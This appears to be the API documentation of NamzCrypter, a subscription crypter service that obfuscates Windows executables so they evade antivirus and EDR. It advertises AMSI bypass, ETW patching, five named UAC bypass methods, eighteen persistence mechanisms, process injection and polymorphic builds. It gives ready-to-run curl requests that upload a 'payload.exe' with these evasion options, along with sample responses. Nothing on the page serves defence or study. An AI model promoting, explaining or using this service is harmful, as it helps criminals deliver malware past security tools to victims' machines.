NAMZCRYPTER

Advanced Threat Protection System

0%
INITIALIZING SYSTEM0%
0
Modules
AES-256
Encryption
SECURE
Status
All API requests require authentication via API key in the header

Professional, Elite & Lifetime Access Only

API access is available for Professional (50 req/day), Elite (200 req/day), and Lifetime (unlimited) plan members. Starter plan does not include API access.

Rate Limits

Starter ($39/mo) No Access
Professional ($89/mo)50 req/day
🔥 Elite ($149/mo)200 req/day
👑 Lifetime ($499)∞ Unlimited
🔥 ELITEAPT-Level Features (Elite & Lifetime)

Unlock the most advanced evasion capabilities with Elite or Lifetime plans. These features are designed for APT-level operations.

AMSI Bypass

Bypass Windows Defender AMSI scanning with runtime patching. Undetected by real-time protection.

ETW Patching

Disable Event Tracing for Windows to evade EDR behavioral detection and logging.

5x UAC Bypass

5 silent UAC bypass methods with auto-fallback: FodHelper, ComputerDefaults, EventVwr, SDCLT, SilentCleanup.

18 Persistence Methods

Registry, Tasks, Services, WMI, DLL Hijack, COM Hijack, LSA, Netsh, Print Monitor, and more.

6 Injection Techniques

DLL Injection, Process Hollowing, APC, CLR Injection, Assembly.Load, Profiling API.

Polymorphic Engine

Every build generates unique code with different signatures, hashes, and structure.

POST/api/v1/crypt

Crypt an executable file with the specified options. Returns a job ID and download URL for the crypted file.

Request Headers
Authorization: Bearer YOUR_API_KEY
Content-Type: multipart/form-data
Parameters
NameTypeDescription
filerequiredfileThe executable file to crypt (.exe only)
typestringPayload type: "auto", "native", "dotnet" (default: auto)
injectionstringInjection method: "dll_injection", "process_hollowing", "apc_injection", "clr_injection", "assembly_load", "profiling_api" (Elite+)
anti_vmbooleanEnable virtual machine detection ("true" or "false")
anti_debugbooleanEnable anti-debugging protection ("true" or "false")
amsi_bypassbooleanEnable AMSI bypass (Elite+)
etw_patchbooleanEnable ETW patching (Elite+)
uac_bypassbooleanEnable UAC bypass with 5 fallback methods (Elite+)
persistencestringPersistence method: "registry_run", "scheduled_task", "startup_folder", "service", "wmi_event", "dll_hijack", "com_hijack", "appinit_dll", "image_file_exec", "winlogon", "lsa", "netsh_helper", "print_monitor", "security_provider", "office_addin", "powershell_profile", "screensaver", "bitsadmin" (Elite+)
delayintegerExecution delay in seconds (0-360)
meltbooleanSelf-delete after execution ("true" or "false")
hide_windowbooleanHide console window (default: "true")
Example Request (Basic)
# Basic crypt request
curl -X POST https://namzcrypter.net/api/v1/crypt \
  -H "Authorization: Bearer YOUR_API_KEY" \
  -F "file=@payload.exe" \
  -F "type=auto" \
  -F "injection=process_hollowing" \
  -F "anti_vm=true" \
  -F "anti_debug=true" \
  -F "delay=5"
Example Request (Elite Features)
# APT-Level crypt with all Elite features
curl -X POST https://namzcrypter.net/api/v1/crypt \
  -H "Authorization: Bearer YOUR_API_KEY" \
  -F "file=@payload.exe" \
  -F "type=dotnet" \
  -F "injection=clr_injection" \
  -F "anti_vm=true" \
  -F "anti_debug=true" \
  -F "amsi_bypass=true" \
  -F "etw_patch=true" \
  -F "uac_bypass=true" \
  -F "persistence=scheduled_task" \
  -F "delay=30"
Response
{
  "success": true,
  "data": {
    "id": "crypt_abc123xyz...",
    "download_url": "/api/v1/download/abc123xyz...",
    "expires_at": "2025-12-03T12:00:00Z",
    "file_size": 1048576,
    "hash": "sha256:...",
    "payload_type": "dotnet",
    "features": {
      "amsi_bypass": true,
      "etw_patch": true,
      "uac_bypass": true,
      "persistence": "scheduled_task"
    }
  }
}
GET/api/v1/download/{job_id}

Download a crypted file by job ID. Returns the file as an attachment. Links expire after 24 hours.

Request Headers
Authorization: Bearer YOUR_API_KEY
Response

Returns the crypted executable file as a binary download.

GET/api/v1/status/{job_id}

Check the status of a crypt job. The job_id can include or exclude the "crypt_" prefix.

Response
{
  "success": true,
  "data": {
    "id": "crypt_abc123xyz...",
    "status": "completed",
    "progress": 100,
    "created_at": "2025-12-02T10:30:00Z",
    "error": null
  }
}
GET/api/v1/account

Get information about your account, including subscription status and usage statistics.

Response
{
  "success": true,
  "data": {
    "username": "your_username",
    "plan": "elite",
    "builds_today": 12,
    "builds_limit": "unlimited",
    "api_calls_today": 34,
    "api_calls_limit": 200,
    "expires_at": "2026-01-15T00:00:00Z"
  }
}

Note: Lifetime plans show "unlimited" for builds_limit and api_calls_limit. Plans: starter, professional, elite, lifetime.

DELETE/api/v1/crypt/{job_id}

Delete a crypted file from our servers. Files are automatically deleted after 24 hours. The job_id can include or exclude the "crypt_" prefix.

Response
{
  "success": true,
  "message": "File deleted successfully"
}
ERRORError Responses

All API endpoints return consistent error responses with appropriate HTTP status codes.

Common Error Codes
CodeMessageDescription
401Missing API keyNo Authorization header provided
401Invalid API keyAPI key not found or inactive
401API access requires Professional or Lifetime planUser doesn't have API access
401Rate limit exceeded50 requests/day limit reached (Professional)
400Invalid PE fileFile is not a valid Windows executable
404Job not foundCrypt job doesn't exist or doesn't belong to user
410Download link expiredFile expired after 24 hours
Error Response Format
{
  "success": false,
  "message": "Error description here"
}